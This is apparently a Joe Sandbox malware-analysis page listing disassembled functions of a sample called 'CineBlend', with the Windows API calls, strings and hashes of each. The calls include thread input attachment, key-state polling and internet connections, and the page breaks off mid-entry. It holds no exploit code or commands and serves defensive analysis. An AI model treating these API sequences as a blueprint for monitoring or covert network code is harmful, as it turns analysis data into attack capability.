API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 97b150bc37d0b3df055694111dbbf1f5d4d0d576e6af8934dc848aaad3ca372c
Instruction ID: 7fd0fab3a94f68137a7bb42896159e646af87bf12f2242e3d7d76ccc0fc0723f
Opcode Fuzzy Hash: 97b150bc37d0b3df055694111dbbf1f5d4d0d576e6af8934dc848aaad3ca372c
Instruction Fuzzy Hash: C221A175E00218BBCF05AFA4DC85EEEBBF8EF15700F0040A6B991A7191DB758919DB60

Function 00BD44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BD4539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BD453C
GetWindowLongW.USER32(?,000000F0), ref: 00BD4563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BD4586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BD45FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00BD4648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00BD4663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00BD467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00BD4692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00BD46AF

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 3a067ede2ce27d145a07f4ea078cfe640438672566d13f8958d6fa0fd438fb2e
Instruction ID: 8996ee82afa87d420eba4cbc391266fc7188d74d3aefcde487f228302410cd42
Opcode Fuzzy Hash: 3a067ede2ce27d145a07f4ea078cfe640438672566d13f8958d6fa0fd438fb2e
Instruction Fuzzy Hash: 5C614A75A00208AFDB10DFA8CC81FEEB7F8EB0A710F10419AFA15A73A1D774A955DB50

Function 00BABAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00BABB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABB2C
GetWindowThreadProcessId.USER32(00000000), ref: 00BABB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 00BABB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00BAABA8,?,00000001), ref: 00BABBE4

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: c43603317952503fd9e86093efc3ac417c52b12fd77d8858383bcff1010471c2
Instruction ID: 2c4ff94cfa5515ebbcd8d40e353efd322dc2d065cfd9b54691f7610ced3a8e59
Opcode Fuzzy Hash: c43603317952503fd9e86093efc3ac417c52b12fd77d8858383bcff1010471c2
Instruction Fuzzy Hash: 1431BDB2A09204AFDB14DB25DC98FAD77E9FB0B312F518096FA15D71A1DBB4D8408B70

Function 00B72FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B73007

Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60

_free.LIBCMT ref: 00B73013
_free.LIBCMT ref: 00B7301E
_free.LIBCMT ref: 00B73029
_free.LIBCMT ref: 00B73034
_free.LIBCMT ref: 00B7303F
_free.LIBCMT ref: 00B7304A
_free.LIBCMT ref: 00B73055
_free.LIBCMT ref: 00B73060
_free.LIBCMT ref: 00B7306E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ffdced1f33752c0ea555366b233fba3f8768fb3feb52693ed267598f20e4ead8
Instruction ID: be693b7dd4d1fc5c7a95e7ab547c1a9d07d5db35a9b21b54de7e0147a9392f90
Opcode Fuzzy Hash: ffdced1f33752c0ea555366b233fba3f8768fb3feb52693ed267598f20e4ead8
Instruction Fuzzy Hash: 02117276500108EFCB11EF94C842DDD3BA9EF09350F9185E5FA1C9F222DA32EA519B90

Function 00BB8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB89F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8A06
GetFileAttributesW.KERNEL32(?), ref: 00BB8A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00BB8A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00BB8AF5

Strings

*.*, xrefs: 00BB8AAB

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 00a345608547959d74472f14324b25d200974a0864d656035aa4d3ccf33490df
Instruction ID: 75b6c4f5ecfda005ded8acb7c720fec563f23b111a4ee68e9452cab7c0952768
Opcode Fuzzy Hash: 00a345608547959d74472f14324b25d200974a0864d656035aa4d3ccf33490df
Instruction Fuzzy Hash: 1C818E719042459BCB24EF14C884ABAB3ECFF84310F5448AAF8C9D7250EFB4DA45CB92

Function 00B47447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00B474D7

Part of subcall function 00B47567: GetClientRect.USER32(?,?), ref: 00B4758D
Part of subcall function 00B47567: GetWindowRect.USER32(?,?), ref: 00B475CE
Part of subcall function 00B47567: ScreenToClient.USER32(?,?), ref: 00B475F6

GetDC.USER32 ref: 00B86083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B86096
SelectObject.GDI32(00000000,00000000), ref: 00B860A4
SelectObject.GDI32(00000000,00000000), ref: 00B860B9
ReleaseDC.USER32(?,00000000), ref: 00B860C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B86152

Strings

U, xrefs: 00B86021

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c5cb05847d35af57b674440f8d7752ce55677f46d5d4383dd15ca67fd5e62867
Instruction ID: 3a038abeb8499602ca2f10f65c575526d10052044c1596de73a94216198992bb
Opcode Fuzzy Hash: c5cb05847d35af57b674440f8d7752ce55677f46d5d4383dd15ca67fd5e62867
Instruction Fuzzy Hash: 9E71AE31500205DFCF25AF68C8C9ABA7BF5FF49320F1442EAE9556A2B7DB318940EB50

Function 00BD955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0

Part of subcall function 00B419CD: GetCursorPos.USER32(?), ref: 00B419E1
Part of subcall function 00B419CD: ScreenToClient.USER32(00000000,?), ref: 00B419FE
Part of subcall function 00B419CD: GetAsyncKeyState.USER32(00000001), ref: 00B41A23
Part of subcall function 00B419CD: GetAsyncKeyState.USER32(00000002), ref: 00B41A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00BD95C7
ImageList_EndDrag.COMCTL32 ref: 00BD95CD
ReleaseCapture.USER32 ref: 00BD95D3
SetWindowTextW.USER32(?,00000000), ref: 00BD966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BD9681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00BD975B

Strings

@GUI_DRAGFILE, xrefs: 00BD96F6
@GUI_DROPID, xrefs: 00BD96AD

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 8b8e7cf6a5e0dc51d511bc94fb7b1abbd4e788683e0fd24b7429725588729470
Instruction ID: 3b107416d3ddb3de787b557a1967f3f1154878ee7190c4ff88a61826f13d02c1
Opcode Fuzzy Hash: 8b8e7cf6a5e0dc51d511bc94fb7b1abbd4e788683e0fd24b7429725588729470
Instruction Fuzzy Hash: 1D518E75204300AFD704EF24CC56FAAB7E4FB88714F40066AF595972E1EB709E08DB52

Function 00BBCC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BBCCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BBCCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BBCD0F
GetLastError.KERNEL32 ref: 00BBCD67
SetEvent.KERNEL32(?), ref: 00BBCD7B
InternetCloseHandle.WININET(00000000), ref: 00BBCD86

Strings

, xrefs: 00BBCD00

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 2e43f30cbdf6a6f54f96976ca8be254552f4534f21e9a4e32b9be50f4b31889b
Instruction ID: 87d3fc211f854be8495ff8c981cda601c6d26e094a1a6e139540d5b535b9b817
Opcode Fuzzy Hash: 2e43f30cbdf6a6f54f96976ca8be254552f4534f21e9a4e32b9be50f4b31889b
Instruction Fuzzy Hash: 92314B75601604AFD721EF65CC88ABBBFFCEB45740B1045BAB48693200EBB4ED049BA5

Function 00BAA215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B855AE,?,?,Bad directive syntax error,00BDDCD0,00000000,00000010,?,?), ref: 00BAA236
LoadStringW.USER32(00000000,?,00B855AE,?), ref: 00BAA23D

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00BAA301

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00BAA26B
Line %d:, xrefs: 00BAA28C
., xrefs: 00BAA2E7
Error: , xrefs: 00BAA2CF
Line %d (File "%s"):, xrefs: 00BAA2A7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: ef83b84b6027ba230df4f9fb7d417782dee3065b87babb40238647d05c343e98
Instruction ID: ffd9bb0749cf721257bc1abbd5bf37b7030c840635e354c9ae657cd2edeb0cf1
Opcode Fuzzy Hash: ef83b84b6027ba230df4f9fb7d417782dee3065b87babb40238647d05c343e98
Instruction Fuzzy Hash: D621613180421EEBCF06AF90CC46EEE77B5FF18700F0444A5F515660A2EB71A618EB51

Function 00BA29EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00BA29F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00BA2A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00BA2A9A

Strings

SHELLDLL_DefView, xrefs: 00BA2A19
largeicons, xrefs: 00BA2A2E
list, xrefs: 00BA2A7C
details, xrefs: 00BA2A48
smallicons, xrefs: 00BA2A62

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 2626627fa72a5bfc28e2f933b6d8c9dffce875001f8345aab8806e8e838bde4f
Instruction ID: 61fce66938aa6a1840bf97b463c63c87f213a2a5fbb8210926938849a8d53734
Opcode Fuzzy Hash: 2626627fa72a5bfc28e2f933b6d8c9dffce875001f8345aab8806e8e838bde4f
Instruction Fuzzy Hash: B91125B678C707BAFA246B28EC07DAA7BDCCF16724B2000B2FA05E50D1FF65AC109554

Function 00B47567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00B4758D
GetWindowRect.USER32(?,?), ref: 00B475CE
ScreenToClient.USER32(?,?), ref: 00B475F6
GetClientRect.USER32(?,?), ref: 00B4773A
GetWindowRect.USER32(?,?), ref: 00B4775B

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: bd561a616f2aacb91c511bdac85ac319ea0ba71f74ab40c5d5398157fa19c836
Instruction ID: 3ac2f6e51af72fec8f66607ec9500f40c186ddd6a4c3a7c880591adb874b75c6
Opcode Fuzzy Hash: bd561a616f2aacb91c511bdac85ac319ea0ba71f74ab40c5d5398157fa19c836
Instruction Fuzzy Hash: 54C16D3590465AEFDF10DFA8C580BEDB7F1FF18310F14845AE895A7250DB34AA51EBA0

Function 00B7D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00B7D237
_free.LIBCMT ref: 00B7D2A2
_free.LIBCMT ref: 00B7D2C8
_free.LIBCMT ref: 00B7D2F1
_free.LIBCMT ref: 00B7D329
_free.LIBCMT ref: 00B7D35A
_free.LIBCMT ref: 00B7D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00B7D41C
_free.LIBCMT ref: 00B7D435

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: c55ff39da87e4d59cdc95f9742b07215e7ce28c345239c78c65f4a44424deacd
Instruction ID: 5128bfb43d6895c65ecadb0db63563da0b24f621b29590cd16a59769feca0a27
Opcode Fuzzy Hash: c55ff39da87e4d59cdc95f9742b07215e7ce28c345239c78c65f4a44424deacd
Instruction Fuzzy Hash: FF610671904305AFDB22AF74E8817AE7BF4EF023A0F15C5EDED6DA7282E63598018751

Function 00BD5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00BD5C24
ShowWindow.USER32(?,00000000), ref: 00BD5C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00BD5C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00BD5C6F

Part of subcall function 00BD79F2: DeleteObject.GDI32(00000000), ref: 00BD7A1E

GetWindowLongW.USER32(?,000000F0), ref: 00BD5CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD5CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BD5CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00BD5D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00BD5D34

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 9dd159731117ec248319221c58e2f51b2c0c646c6064aa7f1d0abade697c96aa
Instruction ID: 714ac82444e2edbfb30fbe67c1ef1cbf526be14d8a6b02b536d9230c2ff8bfa3
Opcode Fuzzy Hash: 9dd159731117ec248319221c58e2f51b2c0c646c6064aa7f1d0abade697c96aa
Instruction Fuzzy Hash: 61518030651A09BFEF349F18CC49F98BBE6EB04750F144193F6149A3E0EB75A9909B51

Function 00B413A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00B828D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00B828EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B828FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00B82912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B82933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B411F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B82942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B8295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B411F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B8296E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 3eccd1b1ff15717da0ade051e4a0d42b4d626213edbb26a2529263b8bee8e39c
Instruction ID: dcf7d41ee51cc244c5cd1472a60388c1c01356863437b6631bf8ba09c0c41338
Opcode Fuzzy Hash: 3eccd1b1ff15717da0ade051e4a0d42b4d626213edbb26a2529263b8bee8e39c
Instruction Fuzzy Hash: F0516E34A00205AFDB24DF29CC95BAA77F5FF48714F104969F946972A0DB70E990EB50

Function 00BBCB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BBCBC7
GetLastError.KERNEL32 ref: 00BBCBDA
SetEvent.KERNEL32(?), ref: 00BBCBEE

Part of subcall function 00BBCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BBCCB7
Part of subcall function 00BBCC98: GetLastError.KERNEL32 ref: 00BBCD67
Part of subcall function 00BBCC98: SetEvent.KERNEL32(?), ref: 00BBCD7B
Part of subcall function 00BBCC98: InternetCloseHandle.WININET(00000000), ref: 00BBCD86

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 4e4ed0cf701e8d997d99a55bf71a46abe4ee88323f484f03d867667ff7281743
Instruction ID: 60dfe65325b7537ef609d98e6a054053552d9accac585b1aadd59b1d689e5a54
Opcode Fuzzy Hash: 4e4ed0cf701e8d997d99a55bf71a46abe4ee88323f484f03d867667ff7281743
Instruction Fuzzy Hash: 84316B71601705AFDB21DF65CD94ABABFF8FF54300B14456EF89A83610DBB1E814ABA0

Function 00BA2EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA43AD
Part of subcall function 00BA4393: GetCurrentThreadId.KERNEL32 ref: 00BA43B4
Part of subcall function 00BA4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00BA2F00), ref: 00BA43BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA2F0A
